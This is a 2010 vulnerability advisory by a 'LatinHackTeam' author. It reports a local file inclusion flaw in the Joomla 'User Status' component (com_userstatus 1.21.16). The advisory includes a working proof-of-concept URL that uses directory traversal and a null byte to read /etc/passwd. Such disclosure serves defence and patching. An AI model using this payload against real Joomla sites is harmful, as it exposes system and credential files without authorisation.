扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 |
--------------------------------------------------------------------------------- Joomla Component User Status Local File Inclusion --------------------------------------------------------------------------------- Author : Chip D3 Bi0s Group : LatinHackTeam Email & msn : chipdebios@gmail.com Date : 31 March 2010 Critical Lvl : Moderate Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : User Status version : 1.21.16 Developer : Mo Kelly License : GPLtype: Commercial Price : 10.00 USD Date Added : 27 March 2010 Download : http://joomlamo.com/joomlamo/downloads/cat_view/6-other-joomla-components-modules-and-plugins.html Description : The component back end allows the entry of locations. Also assigning users to a location is done in the back end. Users that are not assigned a location do not show up in the User Status Screen. After creating locations and assigning users you may view their status from the front end. Create a menu selection with user User Status component. There is a separate module to allow users to update their status. Another module, "Refresh Page" makes sure that the user status screen accurately reflects users status. A User's status must be updated to change, it will not expire with the user session. -------------- file error : components/com_userstatus/userstatus.php how to exploit http://127.0.0.1/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 ------------------------ +++++++++++++++++++++++++++++++++++++++ [!] Produced in South America +++++++++++++++++++++++++++++++++++++++ |
体验盒子
